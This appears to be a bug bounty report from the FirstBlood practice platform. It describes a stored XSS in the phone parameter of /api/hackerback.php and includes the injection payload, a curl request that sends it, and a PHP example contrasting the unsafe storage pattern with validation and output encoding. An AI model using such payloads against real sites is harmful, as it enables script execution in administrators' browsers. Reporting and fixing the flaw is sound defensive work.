FirstBlood-#1020: Stored XSS on drpanel
This issue was discovered on FirstBlood v3

On 2022-12-08, lumbridge7 Level 4 reported:

Hello firstblood team!


The API endpoint that handles the request to join an event doesn't properly sanitize the input on the phone parameter. While it is not possible to insert anything other than numbers through the GUI, an attacker can still manually craft the POST request using malicious JS code as the phone value.

Steps to reproduce

  1. Make a POST request at with the payload full_name=StoredXSS&phone=<img src=x onerror=confirm(document.domain)>&submit=Signup
  2. Log in to the drpanel

Curl request:

curl -X POST '' -H "Content-Type: application/x-www-form-urlencoded" -d "full_name=StoredXSS&phone=<img%20src=x%20onerror=confirm(document.domain)>&submit=Signup"



Endpoint: /api/hackerback.php

Parameter: phone

Payload: <img src=x onerror=confirm(document.domain)>

FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.
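The root cause above is trusting a client-side input type. The following is an added example (not FirstBlood's code) of how a PHP handler for such an endpoint should treat the phone field: the function names, the regex and the sample inputs are assumptions, and the "tel" type is left to the browser as a convenience only.

```php
<?php
// Added example, not the FirstBlood code base. Shows the weak pattern beside
// the hardened one for a phone field that is later shown to an admin.

// Weak pattern (assumed shape of the bug): the raw value is stored and later
// echoed into the panel, so HTML in it is interpreted by the admin's browser.
function store_phone_unsafe(string $phone): string {
    return $phone;
}

// Hardened step 1: validate on the server, independent of the HTML form.
// Returns the normalized number, or null so the caller can reject with 400.
function validate_phone(string $phone): ?string {
    $normalized = trim($phone);
    // Digits, optional leading '+', spaces, dashes, parentheses; 6 to 20 chars.
    if (!preg_match('/^\+?[0-9][0-9 ()\-]{5,19}$/', $normalized)) {
        return null;
    }
    return $normalized;
}

// Hardened step 2: encode on output regardless of validation, so a value that
// reaches storage by any other path is rendered as text, not markup.
function render_phone_cell(string $phone): string {
    return '<td>' . htmlspecialchars($phone, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Constructed inputs: the payload from the report and a legitimate number.
$payload = '<img src=x onerror=confirm(document.domain)>';
$legit   = '+1 555 0100';

var_dump(validate_phone($payload));   // rejected before storage
var_dump(validate_phone($legit));     // accepted
echo render_phone_cell($payload), "\n"; // shown as literal text in the panel
```

Both steps are needed: validation stops the value at the API, and output encoding protects the panel if validation is ever relaxed or bypassed.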

Report Feedback


Creator & Administrator

Congratulations, you were the third researcher to discover this!